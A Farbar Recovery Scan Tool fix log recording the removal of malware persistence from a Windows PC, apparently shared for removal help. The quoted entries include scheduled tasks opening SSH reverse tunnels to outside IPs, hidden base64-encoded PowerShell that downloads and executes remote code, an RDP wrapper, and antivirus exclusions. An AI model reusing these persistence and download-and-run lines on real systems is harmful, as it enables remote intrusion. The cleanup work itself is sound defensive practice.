Fix result of Farbar Recovery Scan Tool (x64) Version: 05-08-2026 Ran by PG (05-08-2026 14:51:56) Run:1 Running from C:\Users\PG\Downloads Loaded Profiles: PG Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: SystemRestore: On CreateRestorePoint: RemoveProxy: File: C:\Users\PG\AppData\Roaming\Volume2\Volume2.exe; C:\Users\PG\.ssh\ssh.exe HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION HKLM\SYSTEM\...\Terminal Server: [fDenyTSConnections] = 0 <==== ATTENTION HKU\S-1-5-21-3754613442-372446698-354282701-1001\...\Run: [Volume2] => C:\Users\PG\AppData\Roaming\Volume2\Volume2.exe [10368512 2025-09-21] (Alexandr Irza) [File not signed] <==== ATTENTION Task: {515128B5-1654-4693-BC9F-4ACB4FE0FC93} - System32\Tasks\Apple Sync => C:\Users\PG\.ssh\ssh.exe [946176 2026-07-09] () [File not signed] -> -N -R 54985:localhost:109 PiBZinY2y71@104.243.32.213 -i "C:\Users\PG\.ssh\\PiBZinY2y71.54985" -f "C:\Users\PG\.ssh\config" <==== ATTENTION Task: {88501F15-2296-4DCC-9469-82471C022F61} - System32\Tasks\GDrive Backup Sync => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -ep bypass -w hidden -nop -enc JABMAGkAbgBrAEkARQBYACAAPQAgACcAaAB0AHQAcABzADoALwAvAGsAYgBlAGEAdQB0AHkAcgBlAHYAaQBlAHcAcwAuAGMAbwBtACcAOwAKACQAQwA9AGkAdwByACAAJABMAGkAbgBrAEkARQBYACAALQBVAHMARQBCAGEAUwBJAGMAUABBAHIAcwBpAE4AZwAgAHwAaQBlAHgAOwA= <==== ATTENTION Task: {C10BB470-4591-445C-8CEF-3A65BA164564} - System32\Tasks\GoogleUpdaterTask => C:\Users\PG\.ssh\ssh.exe [946176 2026-07-09] () [File not signed] -> -N -R 54985:localhost:109 PiBZinY2y71@62.210.188.209 -i "C:\Users\PG\.ssh\PiBZinY2y71.54985" -f "C:\Users\PG\.ssh\config" <==== ATTENTION Task: {7001A7FB-6212-4B23-9D2C-E582788FAEB8} - System32\Tasks\OneDrive Reporting => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -ep bypass -w hidden -nop -enc JABDAD0AaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AcgBlAGMAYQB2AGIAMgAyAC4AbwBuAGwAaQBuAGUAIAAtAFUAcwBFAEIAYQBTAEkAYwBQAEEAcgBzAGkATgBnACAAfABpAGUAeAA= <==== ATTENTION S4 TermService; C:\WINDOWS\system32\rdpwrap.dll [116736 2026-08-01] (Stas'M Corp.) [File not signed] <==== ATTENTION (no ServiceDLL) U3 aspnet_state; no ImagePath S3 MpKsl9ef9127d; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{CECC7104-C57B-4D3A-99D1-43728E1B3A4B}\MpKslDrv.sys (No File) 2026-06-30 23:27 - 2026-08-04 18:12 - 000134015 _____ () C:\Users\PG\AppData\Roaming\gjmignimbakkmjdmjpgghpmikmlpfjgi.crx ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File cmd: netsh advfirewall reset export "c:\advfirewallpolicy.wfw" StartRegedit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer] "SmartScreenEnabled"="Warn" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "ConsentPromptBehaviorAdmin"=dword:00000005 "ConsentPromptBehaviorUser"=dword:00000003 "EnableLUA"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Configuration Manager] "EnablePeriodicBackup"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] "DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00 "Description"="@%SystemRoot%\\System32\\termsrv.dll,-267" "DisplayName"="Remote Desktop Services" "ErrorControl"=dword:00000001 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,4e,00,65,00,74,00,77,00,6f,00,72,00,6b,00,53,00,65,00,72,00,76,\ 00,69,00,63,00,65,00,00,00 "ObjectName"="NT Authority\\NetworkService" "RequiredPrivileges"=hex(7):53,00,65,00,41,00,73,00,73,00,69,00,67,00,6e,00,50,\ 00,72,00,69,00,6d,00,61,00,72,00,79,00,54,00,6f,00,6b,00,65,00,6e,00,50,00,\ 72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,41,00,75,\ 00,64,00,69,00,74,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\ 00,00,53,00,65,00,43,00,68,00,61,00,6e,00,67,00,65,00,4e,00,6f,00,74,00,69,\ 00,66,00,79,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\ 53,00,65,00,43,00,72,00,65,00,61,00,74,00,65,00,47,00,6c,00,6f,00,62,00,61,\ 00,6c,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,\ 65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,6e,00,61,00,74,00,65,00,50,\ 00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,\ 6e,00,63,00,72,00,65,00,61,00,73,00,65,00,51,00,75,00,6f,00,74,00,61,00,50,\ 00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,00,00 "ServiceSidType"=dword:00000001 "Start"=dword:00000003 "Type"=dword:00000020 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters] "ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\ 00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\ 74,00,65,00,72,00,6d,00,73,00,72,00,76,00,2e,00,64,00,6c,00,6c,00,00,00 "ServiceDllUnloadOnStop"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Performance] "Close"="CloseTSObject" "Collect"="CollectTSObjectData" "Collect Timeout"=dword:000003e8 "Library"="C:\\Windows\\System32\\perfts.dll" "Open"="OpenTSObject" "Open Timeout"=dword:000003e8 "InstallType"=dword:00000001 "PerfIniFile"="tslabels.ini" "Library Validation Code"=hex:00,1e,2f,04,d0,c4,db,01,00,46,01,00,00,00,00,00 "2003"=hex(b):15,0c,f9,c6,d6,cc,dc,01 "Last Counter"=dword:0000098e "Last Help"=dword:0000098f "First Counter"=dword:0000098e "First Help"=dword:0000098f "Object List"="2446" EndRegedit: StartPowerShell: & "C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate -MMPC Get-MpPreference | select Exclusion*, ThreatID*, Control* $Paths=(Get-MpPreference).ExclusionPath foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -Verbose} $Extensions=(Get-MpPreference).ExclusionExtension foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -Verbose} $Processes=(Get-MpPreference).ExclusionProcess foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -Verbose} $ThreatIds = (Get-MpPreference).ThreatIDDefaultAction_Ids Foreach ($ThreatId in $ThreatIds) { Remove-MpPreference -ThreatIDDefaultAction_Ids $ThreatId -Verbose } Get-MpPreference Get-MpComputerStatus Start-Service -Name mpssvc, SecurityHealthService, wscsvc, mpssvc, trustedinstaller, wuauserv, bits, dosvc, usosvc, winmgmt -Verbose gsv mpssvc, SecurityHealthService, WinDefend, wscsvc, mpssvc, trustedinstaller, wuauserv, bits, dosvc, usosvc | select Name, StartType, Status | ft -auto netsh advfirewall show allprofiles state EndPowerShell: CMD: sfc /scanfile=C:\Windows\System32\termsrv.dll Reboot: ***************** Processes closed successfully. SystemRestore: On => completed Restore point was successfully created. ========= RemoveProxy: ========= "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully "HKU\S-1-5-21-3754613442-372446698-354282701-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully "HKU\S-1-5-21-3754613442-372446698-354282701-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully ========= End of RemoveProxy: ========= ========================= File: C:\Users\PG\AppData\Roaming\Volume2\Volume2.exe; C:\Users\PG\.ssh\ssh.exe ======================== C:\Users\PG\AppData\Roaming\Volume2\Volume2.exe File not signed MD5: 3304FF75F4292AB97A607D3C2ADC2A80 Creation and modification date: 2026-08-04 16:48 - 2025-09-20 20:51 Size: 010368512 Attributes: ----A Company Name: Alexandr Irza Internal Name: Original Name: Volume2 Product: Volume² Description: Volume² - advanced Windows volume control (64 bit) File Version: 1.1.9.470 Product Version: 1.1.9.470 Copyright: Copyright © 2010-2025 by Alexandr Irza Virusscan: https://virusscan.jotti.org/filescanjob/x1v3mjfhb7 C:\Users\PG\.ssh\ssh.exe File not signed MD5: C05426E6F6DFB30FB78FBA874A2FF7DC Creation and modification date: 2026-06-30 22:41 - 2026-07-09 12:36 Size: 000946176 Attributes: ----A Company Name: Internal Name: Original Name: Product: OpenSSH for Windows Description: File Version: 8.1.0.1 Product Version: OpenSSH_8.1p1 for Windows Copyright: Virusscan: https://virusscan.jotti.org/filescanjob/40qp50zblv ====== End of File: ====== HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => could not remove, key could be protected HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate => removed successfully HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\\"fDenyTSConnections"="1" => value restored successfully "HKU\S-1-5-21-3754613442-372446698-354282701-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Volume2" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{515128B5-1654-4693-BC9F-4ACB4FE0FC93}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{515128B5-1654-4693-BC9F-4ACB4FE0FC93}" => removed successfully C:\WINDOWS\System32\Tasks\Apple Sync => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Apple Sync" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{88501F15-2296-4DCC-9469-82471C022F61}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88501F15-2296-4DCC-9469-82471C022F61}" => removed successfully C:\WINDOWS\System32\Tasks\GDrive Backup Sync => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GDrive Backup Sync" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C10BB470-4591-445C-8CEF-3A65BA164564}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C10BB470-4591-445C-8CEF-3A65BA164564}" => removed successfully C:\WINDOWS\System32\Tasks\GoogleUpdaterTask => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdaterTask" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7001A7FB-6212-4B23-9D2C-E582788FAEB8}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7001A7FB-6212-4B23-9D2C-E582788FAEB8}" => removed successfully C:\WINDOWS\System32\Tasks\OneDrive Reporting => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OneDrive Reporting" => removed successfully HKLM\System\CurrentControlSet\Services\TermService => removed successfully TermService => service removed successfully HKLM\System\CurrentControlSet\Services\aspnet_state => removed successfully aspnet_state => service removed successfully HKLM\System\CurrentControlSet\Services\MpKsl9ef9127d => removed successfully MpKsl9ef9127d => service removed successfully C:\Users\PG\AppData\Roaming\gjmignimbakkmjdmjpgghpmikmlpfjgi.crx => moved successfully HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => removed successfully ========= netsh advfirewall reset export "c:\advfirewallpolicy.wfw" ========= Ok. ========= End of CMD: ========= Registry ====> The operation completed successfully. ========= Powershell: ========= Signature update started . . . Signature update finished. No updates needed ExclusionExtension : ExclusionIpAddress : ExclusionPath : {\C:\ProgramData, \C:\Users\PG, \C:\WINDOWS\system32, C:\\WINDOWS\\System32\...} ExclusionProcess : {cmd.exe, reg.exe} ThreatIDDefaultAction_Actions : ThreatIDDefaultAction_Ids : ControlledFolderAccessAllowedApplications : {C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.11030.15001 .0_x64__8wekyb3d8bbwe\PhotosService\PhotosService.exe} ControlledFolderAccessDefaultProtectedFolders : {C:\Users\PG\Documents, C:\Users\Public\Documents, C:\Users\PG\Pictures, C:\Users\Public\Pictures...} ControlledFolderAccessProtectedFolders : VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'. AiAgentNetworkInspection : 0 AiAgentProtection : 0 AllowDatagramProcessingOnWinServer : False AllowNetworkProtectionDownLevel : False AllowNetworkProtectionOnWinServer : False AllowSwitchToAsyncInspection : True ApplyDisableNetworkScanningToIOAV : False AttackSurfaceReductionOnlyExclusions : AttackSurfaceReductionRules_Actions : AttackSurfaceReductionRules_Ids : AttackSurfaceReductionRules_RuleSpecificExclusions : AttackSurfaceReductionRules_RuleSpecificExclusions_Id : BruteForceProtectionAggressiveness : 0 BruteForceProtectionConfiguredState : 0 BruteForceProtectionExclusions : BruteForceProtectionLocalNetworkBlocking : False BruteForceProtectionMaxBlockTime : 0 BruteForceProtectionSkipLearningPeriod : False CheckForSignaturesBeforeRunningScan : False CloudBlockLevel : 0 CloudExtendedTimeout : 0 ComputerID : 26BD1EBE-F713-4E1D-A87B-3B85F3D57100 ControlledFolderAccessAllowedApplications : {C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.110 30.15001.0_x64__8wekyb3d8bbwe\PhotosService\PhotosService.exe} ControlledFolderAccessDefaultProtectedFolders : {C:\Users\PG\Documents, C:\Users\Public\Documents, C:\Users\PG\Pictures, C:\Users\Public\Pictures...} ControlledFolderAccessProtectedFolders : DefinitionUpdatesChannel : 0 DisableArchiveScanning : False DisableAutoExclusions : False DisableBehaviorMonitoring : False DisableBlockAtFirstSeen : False DisableCacheMaintenance : False DisableCatchupFullScan : True DisableCatchupQuickScan : True DisableCoreServiceECSIntegration : False DisableCoreServiceTelemetry : False DisableCpuThrottleOnIdleScans : True DisableDatagramProcessing : False DisableDnsOverTcpParsing : False DisableDnsParsing : False DisableEmailScanning : True DisableFtpParsing : False DisableGradualRelease : False DisableHttpParsing : False DisableInboundConnectionFiltering : False DisableIOAVProtection : False DisableNetworkProtectionPerfTelemetry : False DisablePrivacyMode : False DisableQuicParsing : True DisableRdpParsing : False DisableRealtimeMonitoring : False DisableRemovableDriveScanning : True DisableRestorePoint : True DisableScanningMappedNetworkDrivesForFullScan : True DisableScanningNetworkFiles : False DisableScriptScanning : False DisableSmtpParsing : False DisableSshParsing : False DisableTamperProtection : False DisableTlsParsing : False EnableControlledFolderAccess : 1 EnableConvertWarnToBlock : False EnableDnsSinkhole : True EnableFileHashComputation : False EnableFullScanOnBatteryPower : False EnableLowCpuPriority : False EnableNetworkProtection : 0 EnableUdpReceiveOffload : False EnableUdpSegmentationOffload : False EngineUpdatesChannel : 0 ExclusionExtension : ExclusionIpAddress : ExclusionPath : ExclusionProcess : ForceUseProxyOnly : False HideExclusionsFromLocalUsers : True HighThreatDefaultAction : 0 IntelTDTEnabled : False LowThreatDefaultAction : 0 MAPSReporting : 2 MeteredConnectionUpdates : False ModerateThreatDefaultAction : 0 NetworkProtectionReputationMode : 0 OobeEnableRtpAndSigUpdate : False PerformanceModeStatus : 1 PlatformUpdatesChannel : 0 ProxyBypass : ProxyPacUrl : ProxyServer : PUAProtection : 1 QuarantinePurgeItemsAfterDelay : 90 QuickScanIncludeExclusions : 0 RandomizeScheduleTaskTimes : True RealTimeScanDirection : 0 RemediationScheduleDay : 0 RemediationScheduleTime : 02:00:00 RemoteEncryptionProtectionAggressiveness : 0 RemoteEncryptionProtectionConfiguredState : 0 RemoteEncryptionProtectionExclusions : RemoteEncryptionProtectionMaxBlockTime : 0 RemoveScanningThreadPoolCap : False ReportDynamicSignatureDroppedEvent : False ReportingAdditionalActionTimeOut : 10080 ReportingCriticalFailureTimeOut : 10080 ReportingNonCriticalTimeOut : 1440 ScanAvgCPULoadFactor : 50 ScanOnlyIfIdleEnabled : True ScanParameters : 1 ScanPurgeItemsAfterDelay : 15 ScanScheduleDay : 0 ScanScheduleOffset : 120 ScanScheduleQuickScanTime : 00:00:00 ScanScheduleTime : 02:00:00 SchedulerRandomizationTime : 4 ServiceHealthReportInterval : 60 SevereThreatDefaultAction : 0 SharedSignaturesPath : SharedSignaturesPathUpdateAtScheduledTimeOnly : False SignatureAuGracePeriod : 0 SignatureBlobFileSharesSources : SignatureBlobUpdateInterval : 60 SignatureDefinitionUpdateFileSharesSources : SignatureDisableUpdateOnStartupWithoutEngine : False SignatureFallbackOrder : MicrosoftUpdateServer|MMPC SignatureFirstAuGracePeriod : 120 SignatureScheduleDay : 8 SignatureScheduleTime : 01:45:00 SignatureUpdateCatchupInterval : 1 SignatureUpdateInterval : 0 SubmitSamplesConsent : 1 ThreatIDDefaultAction_Actions : ThreatIDDefaultAction_Ids : ThrottleForScheduledScanOnly : True TrustLabelProtectionStatus : 0 UILockdown : False UnknownThreatDefaultAction : 0 PSComputerName : AMEngineVersion : 1.1.26070.7 AMProductVersion : 4.18.26070.9 AMRunningMode : Normal AMServiceEnabled : True AMServiceVersion : 4.18.26070.9 AntispywareEnabled : True AntispywareSignatureAge : 0 AntispywareSignatureLastUpdated : 8/5/2026 9:10:03 AM AntispywareSignatureVersion : 1.457.19.0 AntivirusEnabled : True AntivirusSignatureAge : 0 AntivirusSignatureLastUpdated : 8/5/2026 9:10:03 AM AntivirusSignatureVersion : 1.457.19.0 BehaviorMonitorEnabled : True ComputerID : 26BD1EBE-F713-4E1D-A87B-3B85F3D57100 ComputerState : 0 ControlledConfigurationState : 0 DefenderSignaturesOutOfDate : False DeviceControlDefaultEnforcement : DeviceControlPoliciesLastUpdated : 12/31/1600 6:00:00 PM DeviceControlState : Disabled FullScanAge : 2 FullScanEndTime : 8/2/2026 7:06:16 PM FullScanOverdue : False FullScanRequired : False FullScanSignatureVersion : 1.455.474.0 FullScanStartTime : 8/2/2026 4:45:32 PM InitializationProgress : ServiceStartedSuccessfully IoavProtectionEnabled : True IsTamperProtected : True IsVirtualMachine : False LastFullScanSource : 1 LastQuickScanSource : 2 NISEnabled : True NISEngineVersion : 1.1.26070.7 NISSignatureAge : 0 NISSignatureLastUpdated : 8/5/2026 9:10:03 AM NISSignatureVersion : 1.457.19.0 OnAccessProtectionEnabled : True ProductStatus : 524288 QuickScanAge : 0 QuickScanEndTime : 8/5/2026 5:28:56 AM QuickScanOverdue : False QuickScanSignatureVersion : 1.457.11.0 QuickScanStartTime : 8/5/2026 5:27:44 AM RealTimeProtectionEnabled : True RealTimeScanDirection : 0 RebootRequired : False SmartAppControlExpiration : SmartAppControlState : Off TamperProtectionSource : Signatures TroubleShootingDailyMaxQuota : TroubleShootingDailyQuotaLeft : TroubleShootingEndTime : TroubleShootingExpirationLeft : TroubleShootingMode : TroubleShootingModeSource : TroubleShootingQuotaResetTime : TroubleShootingStartTime : PSComputerName : VERBOSE: Performing the operation "Start-Service" on target "Background Intelligent Transfer Service (bits)". VERBOSE: Performing the operation "Start-Service" on target "Delivery Optimization (dosvc)". VERBOSE: Performing the operation "Start-Service" on target "Windows Defender Firewall (mpssvc)". VERBOSE: Performing the operation "Start-Service" on target "Windows Security Service (SecurityHealthService)". VERBOSE: Performing the operation "Start-Service" on target "Windows Modules Installer (trustedinstaller)". VERBOSE: Performing the operation "Start-Service" on target "Update Orchestrator Service (usosvc)". VERBOSE: Performing the operation "Start-Service" on target "Windows Management Instrumentation (winmgmt)". VERBOSE: Performing the operation "Start-Service" on target "Security Center (wscsvc)". VERBOSE: Performing the operation "Start-Service" on target "Windows Update (wuauserv)". Name StartType Status ---- --------- ------ bits Automatic Running dosvc Manual Running mpssvc Automatic Running SecurityHealthService Manual Running trustedinstaller Manual Running usosvc Automatic Running WinDefend Automatic Running wscsvc Automatic Running wuauserv Automatic Running Domain Profile Settings: ---------------------------------------------------------------------- State ON Private Profile Settings: ---------------------------------------------------------------------- State ON Public Profile Settings: ---------------------------------------------------------------------- State ON Ok. ========= End of Powershell: ========= ========= sfc /scanfile=C:\Windows\System32\termsrv.dll ========= Windows Resource Protection did not find any integrity violations. ========= End of CMD: ========= Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 05-08-2026 14:56:10) Result of scheduled keys to remove after reboot: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully ==== End of Fixlog 14:56:10 ====